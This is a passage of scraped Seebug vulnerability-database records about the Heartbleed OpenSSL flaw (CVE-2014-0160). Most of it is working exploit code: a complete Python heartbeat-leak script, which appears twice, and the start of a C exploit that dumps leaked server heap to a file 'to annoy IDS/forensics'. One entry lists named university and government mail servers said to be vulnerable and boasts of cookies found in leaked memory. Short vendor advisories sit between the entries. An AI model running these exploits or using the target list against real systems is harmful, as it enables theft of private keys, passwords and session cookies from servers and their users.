14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01 \r\n''')\r\n\r\nhb = h2bin(''' \r\n18 03 02 00 03\r\n01 40 00\r\n''')\r\n\r\ndef hexdump(s):\r\n for b in xrange(0, len(s), 16):\r\n lin = [c for c in s[b : b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n\r\ndef recvall(s, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time() \r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([s], [], [], 5)\r\n if s in r:\r\n data = s.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n \r\n\r\ndef recvmsg(s):\r\n hdr = recvall(s, 5)\r\n if hdr is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n typ, ver, ln = struct.unpack('>BHH', hdr)\r\n pay = recvall(s, ln, 10)\r\n if pay is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return typ, ver, pay\r\n\r\ndef hit_hb(s):\r\n s.send(hb)\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n\r\n if typ == 24:\r\n print 'Received heartbeat response:'\r\n hexdump(pay)\r\n if len(pay) > 3:\r\n print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n\r\n if typ == 21:\r\n print 'Received alert:'\r\n hexdump(pay)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n\r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n print 'Connecting...'\r\n sys.stdout.flush()\r\n s.connect((args[0], opts.port))\r\n print 'Sending Client Hello...'\r\n sys.stdout.flush()\r\n s.send(hello)\r\n print 'Waiting for Server Hello...'\r\n sys.stdout.flush()\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ == None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if typ == 22 and ord(pay[0]) == 0x0E:\r\n break\r\n\r\n print 'Sending heartbeat request...'\r\n sys.stdout.flush()\r\n s.send(hb)\r\n hit_hb(s)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-86019", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "status": "cve,poc"}, {"lastseen": "2017-11-19T17:26:52", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "CVE ID:CVE-2014-0160\r\n\r\nHP\u591a\u4e2a\u4ea7\u54c1\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\r\n\r\nHP\u591a\u4e2a\u4ea7\u54c1\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nHP Onboard Administrator 4.x\r\nHP AssetManager 9.x\r\nHP Diagnostics 9.x\r\nHP IT Executive Scorecard 9.x\r\nHP LoadRunner 11.x\r\nHP LoadRunner 12.x\r\nHP OpenView Connect-It (CIT) 9.x\r\nHP Performance Center 11.x\r\nHP Performance Center 12.x\r\nHP Server Automation 10.x\r\nHP Service Manager 9.x\r\nHP Smart Update Manager (HP SUM) 6.x\r\nHP System Management Homepage 7.x\r\nHP UCMDB Browser 1.x\r\nHP UCMDB Browser 2.x\r\nHP UCMDB Browser 3.x\r\nHP Universal Discovery Universal CMDB Configuration Manager 10.x\r\nHP Universal Discovery Universal CMDB Configuration Manager 9.x\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\uff1a\r\nhttp://www.hp.com", "reporter": "Root", "published": "2014-04-16T00:00:00", "title": "HP\u591a\u4e2a\u4ea7\u54c1OpenSSL TLS/DTLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62186", "id": "SSV:62186", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "", "status": "details"}, {"lastseen": "2017-11-19T17:26:21", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "CVE ID:CVE-2014-0160\r\n\r\nBlackBerry Link\u662f\u9ed1\u8393\u8bbe\u5907\u7684\u540c\u6b65\u8f6f\u4ef6\u3002\r\n\r\nBlackBerry Link\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nBlackBerry Link 1.x\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\uff1a\r\nhttp://www.blackberry.com", "reporter": "Root", "published": "2014-04-16T00:00:00", "title": "BlackBerry Link OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62182", "id": "SSV:62182", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "", "status": "details"}, {"lastseen": "2017-11-19T17:27:32", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "### \u7b80\u8981\u63cf\u8ff0\uff1a\n\n\u6253\u5305\u4e86\u4e00\u5806\u7f51\u7ad9,\u5185\u5b58\u91cc\u6709cookies :D\n\n### \u8be6\u7ec6\u8bf4\u660e\uff1a\n\neYouMail 5 inurl:edu\n\u641c\u7d20\u51fa\u6765\u5c31\u80fd\u6709\u6f0f\u6d1e\u7684\u673a\u738790%\u5de6\u53f3\n\u524d\u4e09\u9875\u6210\u529f\u7684\u7ed3\u679c\n\n\n```\nmail.jn.gov.cn\nmail.hpu.edu.cn\nmail.just.edu.cn\nmail.hnust.edu.cn\nmail.tjut.edu.cn\nmail.shupl.edu.cn\nmail.haust.edu.cn\nmail.dufe.edu.cn\nmail.jliae.edu.cn\nmail.hist.edu.cn\ndn1s.cmc.edu.cn\nmail.hbpu.edu.cn\nmail.dzu.edu.cn\n```\n\n\nPOC\u9001\u4e0a \u81ea\u5df1\u6d4b\u8bd5\n\n\n```\n#!/usr/bin/python\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\n# The author disclaims copyright to this source code.\nimport sys\nimport struct\nimport socket\nimport time\nimport select\nimport re\nfrom optparse import OptionParser\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\ndef h2bin(x):\n return x.replace(' ', '').replace('\\n', '').decode('hex')\nhello = h2bin('''\n16 03 02 00 dc 01 00 00 d8 03 02 53\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\n00 0f 00 01 01 \n''')\nhb = h2bin(''' \n18 03 02 00 03\n01 40 00\n''')\ndef hexdump(s):\n for b in xrange(0, len(s), 16):\n lin = [c for c in s[b : b + 16]]\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\n print\ndef recvall(s, length, timeout=5):\n endtime = time.time() + timeout\n rdata = ''\n remain = length\n while remain > 0:\n rtime = endtime - time.time() \n if rtime < 0:\n return None\n r, w, e = select.select([s], [], [], 5)\n if s in r:\n data = s.recv(remain)\n # EOF?\n if not data:\n return None\n rdata += data\n remain -= len(data)\n return rdata\n \ndef recvmsg(s):\n hdr = recvall(s, 5)\n if hdr is None:\n print 'Unexpected EOF receiving record header - server closed connection'\n return None, None, None\n typ, ver, ln = struct.unpack('>BHH', hdr)\n pay = recvall(s, ln, 10)\n if pay is None:\n print 'Unexpected EOF receiving record payload - server closed connection'\n return None, None, None\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\n return typ, ver, pay\ndef hit_hb(s):\n s.send(hb)\n while True:\n typ, ver, pay = recvmsg(s)\n if typ is None:\n print 'No heartbeat response received, server likely not vulnerable'\n return False\n if typ == 24:\n print 'Received heartbeat response:'\n hexdump(pay)\n #print pay\n if len(pay) > 3:\n print 'WARNING: server returned more data than it should - server is vulnerable!'\n else:\n print 'Server processed malformed heartbeat, but did not return any extra data.'\n return True\n if typ == 21:\n print 'Received alert:'\n hexdump(pay)\n print 'Server returned error, likely not vulnerable'\n return False\ndef main():\n opts, args = options.parse_args()\n if len(args) < 1:\n options.print_help()\n return\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print 'Connecting...'\n sys.stdout.flush()\n s.connect((args[0], opts.port))\n print 'Sending Client Hello...'\n sys.stdout.flush()\n s.send(hello)\n print 'Waiting for Server Hello...'\n sys.stdout.flush()\n while True:\n typ, ver, pay = recvmsg(s)\n if typ == None:\n print 'Server closed connection without sending Server Hello.'\n return\n # Look for server hello done message.\n if typ == 22 and ord(pay[0]) == 0x0E:\n break\n print 'Sending heartbeat request...'\n sys.stdout.flush()\n s.send(hb)\n hit_hb(s)\nif __name__ == '__main__':\n main()\n```\n\n \n\n### \u6f0f\u6d1e\u8bc1\u660e\uff1a\n\n\n\n[<img src=\"https://images.seebug.org/upload/201404/08221830d27d113ac938c15b29234c5ed509ecfe.jpg\" alt=\"1.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201404/08221830d27d113ac938c15b29234c5ed509ecfe.jpg)\n\n\n\n\n[<img src=\"https://images.seebug.org/upload/201404/08221838a3a7f55603e290339efcc8cf3500f481.jpg\" alt=\"2.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201404/08221838a3a7f55603e290339efcc8cf3500f481.jpg)\n\n\n\u5185\u5b58\u91cc\u6709cookies \n\n[<img src=\"https://images.seebug.org/upload/201404/082221182d9aef33b54dee5567695f6c4215b488.jpg\" alt=\"3.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201404/082221182d9aef33b54dee5567695f6c4215b488.jpg)", "reporter": "Root", "published": "2014-04-11T00:00:00", "title": "\u4ebf\u90ae\u67d0\u7248\u672cOPENSSL heartbleed \u901a\u6740", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-04-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-95013", "id": "SSV:95013", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "", "status": "details"}, {"lastseen": "2017-11-19T17:26:30", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "CVE ID:CVE-2014-0160\r\n\r\nMcAfee Email Gateway\u662f\u4e00\u6b3e\u5168\u9762\u7684\u7535\u5b50\u90ae\u4ef6\u5b89\u5168\u89e3\u51b3\u65b9\u6848\u3002\r\n\r\nMcAfee Email Gateway\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nMcAfee Email Gateway 7.x\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8bf7\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttps://kc.mcafee.com/corporate/index?page=content&id=SB10071", "reporter": "Root", "published": "2014-04-16T00:00:00", "title": "McAfee Email Gateway OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62192", "id": "SSV:62192", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "", "status": "details"}, {"lastseen": "2017-11-19T17:26:16", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "CVE ID:CVE-2014-0160\r\n\r\nBarracuda\u591a\u4e2a\u4ea7\u54c1\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\r\n\r\nBarracuda\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nBarracuda CudaTel Communication Server 2.x\r\nBarracuda CudaTel Communication Server 3.x\r\nBarracuda Firewall 6.x\r\nBarracuda Link Balancer 2.x\r\nBarracuda Load Balancer\r\nBarracuda Load Balancer 4.x\r\nBarracuda Load Balancer ADC 5.x\r\nBarracuda Message Archiver\r\nBarracuda Message Archiver 3.x\r\nBarracuda Web Application Firewall 7.x\r\nBarracuda Web Filter\r\nBarracuda Web Filter 7.x\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8bf7\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttps://www.barracuda.com/blogs/pmblog?bid=2279", "reporter": "Root", "published": "2014-04-16T00:00:00", "title": "Barracuda\u591a\u4e2a\u4ea7\u54c1OpenSSL TLS/DTLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62181", "id": "SSV:62181", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "", "status": "details"}, {"lastseen": "2017-11-19T17:26:43", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "CVE ID:CVE-2014-0160\r\n\r\nOracle Session Monitor Suite\u662f\u4e00\u6b3eOracle\u516c\u53f8\u63a8\u51fa\u7684\u4f1a\u8bdd\u76d1\u89c6\u5957\u4ef6\u3002\r\n\r\nOracle Session Monitor Suite\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\r\n0\r\nOracle Session Monitor Suite 3.x\r\nOracle Session Monitor Suite 3.3.40.2.1\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.oracle.com", "reporter": "Root", "published": "2014-04-21T00:00:00", "title": "Oracle Session Monitor Suite OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62240", "id": "SSV:62240", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "", "status": "details"}, {"lastseen": "2017-11-19T14:03:33", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-07-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Heartbleed OpenSSL - Information Leak Exploit (1)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86061", "id": "SSV:86061", "sourceData": "\n /* \r\n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\r\n* =========================================================\r\n* This exploit uses OpenSSL to create an encrypted connection\r\n* and trigger the heartbleed leak. The leaked information is\r\n* returned within encrypted SSL packets and is then decrypted \r\n* and wrote to a file to annoy IDS/forensics. The exploit can \r\n* set heartbeat payload length arbitrarily or use two preset \r\n* values for NULL and MAX length. The vulnerability occurs due \r\n* to bounds checking not being performed on a heap value which \r\n* is user supplied and returned to the user as part of DTLS/TLS \r\n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \r\n* 1.0.1f are known affected. You must run this against a target \r\n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\r\n* This exploit leaks upto 65535 bytes of remote heap each request\r\n* and can be run in a loop until the connected peer ends connection.\r\n* The data leaked contains 16 bytes of random padding at the end.\r\n* The exploit can be used against a connecting client or server,\r\n* it can also send pre_cmd's to plain-text services to establish\r\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients\r\n* will often forcefully close the connection during large leak\r\n* requests so try to lower your payload request size. \r\n*\r\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \r\n*\r\n* E.g.\r\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\r\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ connecting to 192.168.11.23 443/tcp\r\n* [ connected to 192.168.11.23 443/tcp\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=65535\r\n* [ final record type=24, length=16384\r\n* [ wrote 16381 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=42\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=18\r\n* [ wrote 18 bytes of heap to file 'out'\r\n* [ done.\r\n* $ ls -al out\r\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\r\n* $ hexdump -C out\r\n* - snip - snip \r\n*\r\n* Use following example command to generate certificates for clients.\r\n*\r\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\r\n* -keyout server.key -out server.crt\r\n*\r\n* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\r\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto" \r\n*\r\n* todo: add udp/dtls support.\r\n*\r\n* - Hacker Fantastic\r\n* http://www.mdsec.co.uk\r\n*\r\n*/\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n#include <signal.h>\r\n#include <netdb.h>\r\n#include <fcntl.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <inttypes.h>\r\n#include <openssl/bio.h>\r\n#include <openssl/ssl.h>\r\n#include <openssl/err.h>\r\n#include <openssl/evp.h>\r\n#include <openssl/tls1.h>\r\n#include <openssl/rand.h>\r\n#include <openssl/buffer.h>\r\n\r\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\r\n\t\t(((unsigned int)(c[1])) )),c+=2)\r\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\r\n\t\t c[1]=(unsigned char)(((s) )&0xff)),c+=2)\r\n\r\nint first = 0;\r\nint leakbytes = 0;\r\nint repeat = 1;\r\nint badpackets = 0;\r\n\r\ntypedef struct {\r\n\tint socket;\r\n\tSSL *sslHandle;\r\n\tSSL_CTX *sslContext;\r\n} connection;\r\n\r\ntypedef struct {\r\n unsigned char type;\r\n short version;\r\n unsigned int length;\r\n unsigned char hbtype;\r\n unsigned int payload_length;\r\n void* payload;\r\n} heartbeat;\r\n\r\nvoid ssl_init();\r\nvoid usage();\r\nint tcp_connect(char*,int);\r\nint tcp_bind(char*, int);\r\nconnection* tls_connect(int);\r\nconnection* tls_bind(int);\r\nint pre_cmd(int,int,int);\r\nvoid* heartbleed(connection* ,unsigned int);\r\nvoid* sneakyleaky(connection* ,char*, int);\r\n\r\nint tcp_connect(char* server,int port){\r\n\tint sd,ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n host = gethostbyname(server);\r\n sd = socket(AF_INET, SOCK_STREAM, 0);\r\n if(sd==-1){\r\n\t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n bzero(&(sa.sin_zero),8);\r\n\tprintf("[ connecting to %s %d/tcp\\n",server,port);\r\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\r\n\tif(ret==0){\r\n\t\tprintf("[ connected to %s %d/tcp\\n",server,port);\r\n\t}\r\n\telse{\r\n\t\tprintf("[!] FATAL: could not connect to %s %d/tcp\\n",server,port);\r\n\t\texit(0);\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nint tcp_bind(char* server, int port){\r\n\tint sd, ret, val=1;\r\n\tstruct sockaddr_in sin;\r\n\tstruct hostent *host;\r\n\thost = gethostbyname(server);\r\n\tsd=socket(AF_INET,SOCK_STREAM,0);\r\n\tif(sd==-1){\r\n \t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tmemset(&sin,0,sizeof(sin));\r\n\tsin.sin_addr=*((struct in_addr *) host->h_addr);\r\n\tsin.sin_family=AF_INET;\r\n\tsin.sin_port=htons(port);\r\n \tsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\r\n\tret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\r\n\tif(ret==-1){\r\n\t\tprintf("[!] cannot bind socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tlisten(sd,5);\r\n\treturn(sd);\r\n}\r\n\r\n\r\nvoid ssl_init(){\r\n SSL_load_error_strings();\r\n SSL_library_init();\r\n OpenSSL_add_all_digests();\r\n OpenSSL_add_all_algorithms();\r\n OpenSSL_add_all_ciphers();\r\n}\r\n\r\nconnection* tls_connect(int sd){\r\n connection *c;\r\n\tc = malloc(sizeof(connection));\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\r\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n c->sslHandle = 